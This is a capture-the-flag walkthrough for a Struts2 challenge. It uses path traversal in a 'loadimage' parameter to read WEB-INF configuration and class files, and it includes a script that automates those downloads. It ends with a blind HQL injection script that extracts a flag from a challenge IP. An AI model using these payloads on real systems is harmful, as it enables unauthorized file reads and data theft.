Challenge
Hint:
Walkthrough
Directory scanning turned up a `list` endpoint. We tried several scanners, and only wwwscan and webdirscan found it (my wordlist may just be weak).
It requires a login.
Looking at the page source, the way the background image is loaded is odd: it goes through a `loadimage` action with a file-name parameter rather than a static path. That is worth trying as an arbitrary file read.
The cookie contains a JSESSIONID, so the site is written in Java; the first thing to look for is WEB-INF/web.xml:
../../WEB-INF/web.xml
web.xml shows the application is built on Struts2. For background, the linked article explains how Struts2 works; a Struts2 distribution is laid out as:
apps - all of the Struts2 sample projects
docs - the documentation for Struts2 and XWork
lib - all Struts2 JARs plus the JARs Struts2 depends on at runtime
src - all of the Struts2 source code, in the Maven project layout
https://blog.csdn.net/u010004082/article/details/79351459
Next, read struts.xml, which maps every action to its class:
loadimage?fileName=../../WEB-INF/classes/struts.xml
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE struts PUBLIC
    "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
    "http://struts.apache.org/dtds/struts-2.3.dtd">
<struts>
    <constant name="struts.enableDynamicMethodInvocation" value="false"/>
    <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
    <constant name="struts.action.extension" value=","/>
    <package name="front" namespace="/" extends="struts-default">
        <global-exception-mappings>
            <exception-mapping exception="java.lang.Exception" result="error"/>
        </global-exception-mappings>
        <action name="zhuanxvlogin" class="com.cuitctf.action.UserLoginAction" method="execute">
            <result name="error">/ctfpage/login.jsp</result>
            <result name="success">/ctfpage/welcome.jsp</result>
        </action>
        <action name="loadimage" class="com.cuitctf.action.DownloadAction">
            <result name="success" type="stream">
                <param name="contentType">image/jpeg</param>
                <param name="contentDisposition">attachment;filename="bg.jpg"</param>
                <param name="inputName">downloadFile</param>
            </result>
            <result name="suffix_error">/ctfpage/welcome.jsp</result>
        </action>
    </package>
    <package name="back" namespace="/" extends="struts-default">
        <interceptors>
            <interceptor name="oa" class="com.cuitctf.util.UserOAuth"/>
            <interceptor-stack name="userAuth">
                <interceptor-ref name="defaultStack" />
                <interceptor-ref name="oa" />
            </interceptor-stack>
        </interceptors>
        <action name="list" class="com.cuitctf.action.AdminAction" method="execute">
            <interceptor-ref name="userAuth">
                <param name="excludeMethods">
                    execute
                </param>
            </interceptor-ref>
            <result name="login_error">/ctfpage/login.jsp</result>
            <result name="list_error">/ctfpage/welcome.jsp</result>
            <result name="success">/ctfpage/welcome.jsp</result>
        </action>
    </package>
</struts>
```
The `class` attributes name every action class, and each one can be downloaded through the same traversal: replace the dots in the fully qualified name with slashes and append `.class`. The response is served as an image download named `bg.jpg` (see the stream result above), so rename the saved file to `.class` before decompiling it with a Java decompiler such as JD-GUI or Luyten.
The class that looks login-related is UserLoginAction; the payload to fetch it is:
?fileName=../../WEB-INF/classes/com/cuitctf/action/UserLoginAction.class
Decompiled with Luyten:
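As an added example, not from the writeup, the dot-to-slash mapping and download URL construction for every class named in struts.xml, so the whole set can be pulled in one pass instead of by hand. The struts.xml excerpt is a constructed copy of the parts of the file shown above that carry `class` attributes, and the base URL in the usage block is a placeholder:

```python
import os
import urllib.request
import xml.etree.ElementTree as ET

# Constructed: the elements of the struts.xml recovered above that name a class.
STRUTS_XML = """<struts>
  <package name="front" namespace="/" extends="struts-default">
    <action name="zhuanxvlogin" class="com.cuitctf.action.UserLoginAction" method="execute"/>
    <action name="loadimage" class="com.cuitctf.action.DownloadAction"/>
  </package>
  <package name="back" namespace="/" extends="struts-default">
    <interceptors>
      <interceptor name="oa" class="com.cuitctf.util.UserOAuth"/>
    </interceptors>
    <action name="list" class="com.cuitctf.action.AdminAction" method="execute"/>
  </package>
</struts>"""

TRAVERSAL_PREFIX = "../../WEB-INF/classes/"   # the same prefix that read struts.xml


def class_names(struts_xml):
    """Every fully qualified Java class named in a class="..." attribute, in document order."""
    root = ET.fromstring(struts_xml)
    return [el.attrib["class"] for el in root.iter() if "class" in el.attrib]


def class_file_path(fqcn):
    """com.cuitctf.action.UserLoginAction -> ../../WEB-INF/classes/com/cuitctf/action/UserLoginAction.class"""
    return TRAVERSAL_PREFIX + fqcn.replace(".", "/") + ".class"


def download_url(base, fqcn):
    """The loadimage request that returns the compiled class through the traversal."""
    return base + "/loadimage?fileName=" + class_file_path(fqcn)


def fetch_class(base, fqcn, outdir):
    """Download one class file. The server labels the body as bg.jpg (the stream result
    in struts.xml), so save it under the class's own name instead."""
    out = os.path.join(outdir, fqcn.split(".")[-1] + ".class")
    with urllib.request.urlopen(download_url(base, fqcn)) as r, open(out, "wb") as f:
        f.write(r.read())
    return out


if __name__ == "__main__":
    base = "http://target.example"  # placeholder for the challenge host
    for fqcn in class_names(STRUTS_XML):
        print(download_url(base, fqcn))
```

Running it prints one URL per class; `fetch_class` is the same mapping with the download and rename done for you, against whatever host you point it at.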
```java
package com.cuitctf.action;

import com.cuitctf.service.*;
import com.cuitctf.po.*;
import com.cuitctf.util.*;
import org.springframework.context.*;
import com.opensymphony.xwork2.*;
import java.util.regex.*;
import java.util.*;

public class UserLoginAction extends ActionSupport
{
    private UserService userService;
    private User user;

    public UserLoginAction() {
        final ApplicationContext context = InitApplicationContext.getApplicationContext();
        this.userService = (UserService)context.getBean("userService");
    }

    public String execute() throws Exception {
        System.out.println("start:" + this.user.getName());
        final ActionContext actionContext = ActionContext.getContext();
        final Map<String, Object> request = (Map<String, Object>)actionContext.get("request");
        try {
            if (!this.userCheck(this.user)) {
                // "登录失败，请检查用户名和密码" (login failed, check the username and password)
                request.put("error", "\u767b\u5f55\u5931\u8d25\uff0c\u8bf7\u68c0\u67e5\u7528\u6237\u540d\u548c\u5bc6\u7801");
                System.out.println("\u767b\u9646\u5931\u8d25"); // "登陆失败" (login failed)
                return "error";
            }
        }
        catch (Exception e) {
            e.printStackTrace();
            throw e;
        }
        System.out.println("login SUCCESS");
        ActionContext.getContext().getSession().put("user", this.user);
        return "success";
    }

    // Never called from execute(). The quantifier "{1-16}" is also not valid Java
    // regex syntax (Pattern.compile would throw "Illegal repetition"), so this
    // username check is dead either way.
    public boolean isValid(final String username) {
        final String valiidateString = "[a-zA-Z0-9]{1-16}";
        return matcher(valiidateString, username);
    }

    private static boolean matcher(final String reg, final String string) {
        boolean tem = false;
        final Pattern pattern = Pattern.compile(reg);
        final Matcher matcher = pattern.matcher(string);
        tem = matcher.matches();
        return tem;
    }

    // Login succeeds only when the service returns exactly one User row.
    public boolean userCheck(final User user) {
        final List<User> userList = (List<User>)this.userService.loginCheck(user.getName(), user.getPassword());
        if (userList != null && userList.size() == 1) {
            return true;
        }
        this.addActionError("Username or password is Wrong, please check!");
        return false;
    }

    public UserService getUserService() {
        return this.userService;
    }

    public void setUserService(final UserService userService) {
        this.userService = userService;
    }

    public User getUser() {
        return this.user;
    }

    public void setUser(final User user) {
        this.user = user;
    }
}
```
The relevant part is userCheck:
```java
public boolean userCheck(User user) {
    List<User> userList = this.userService.loginCheck(user.getName(), user.getPassword());
    if (userList != null && userList.size() == 1) {
        return true;
    }
    addActionError("Username or password is Wrong, please check!");
    return false;
}
```
There is also a UserServiceImpl class; download it the same way. Its loginCheck:
```java
public List<User> loginCheck(String name, String password) {
    name = name.replaceAll(" ", "");   // spaces are removed from the username
    name = name.replaceAll("=", "");   // and so is '='
    Matcher username_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(name);
    Matcher password_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(password);
    if (password_matcher.find()) {     // only the password is checked; username_matcher is never consulted
        return this.userDao.loginCheck(name, password);
    }
    return null;
}
```
These are the login filtering rules: spaces and `=` are stripped from the username and the password must be purely alphanumeric, but the username itself otherwise reaches the DAO unchecked (`username_matcher` is built and never used).
The query it reaches is in UserDaoImpl.class, where the username is concatenated straight into HQL (Hibernate's named parameters would have avoided this):
```java
public List<User> loginCheck(String name, String password) {
    return getHibernateTemplate().find("from User where name ='" + name + "' and password = '" + password + "'");
}
```
So this is an HQL injection through the username. The filters only shape the payload: whitespace has to be a newline (`%0a`) rather than a space, and `=` has to be avoided, hence `<` and `like`. The welcome page is much larger than the login page, so response length serves as the boolean oracle. Below is a blind-injection script borrowed from another writeup (the line breaks inside the URL in the original listing are the newline characters standing in for spaces; they are written here as `%0a`, and the script is cleaned up for Python 3):
```python
import requests

s = requests.session()
flag = ''
for i in range(1, 50):
    p = ''
    for j in range(1, 255):
        # %0a (newline) stands in for the spaces loginCheck strips; '=' is avoided with '<' and 'like'
        payload = ("(select%0aascii(substr(id," + str(i) + ",1))%0afrom%0aFlag%0awhere%0aid<2)<'"
                   + str(j) + "'")
        url = ("http://111.198.29.45:35732/zhuanxvlogin?user.name=admin'%0aor%0a" + payload
               + "%0aor%0aname%0alike%0a'admin&user.password=1")
        r1 = s.get(url)
        # a long response is the welcome page: ascii(...) < j held for the first time,
        # so the character is the previous j, saved in p
        if len(r1.text) > 20000 and p != '':
            flag += p
            print(i, flag)
            break
        p = chr(j)
```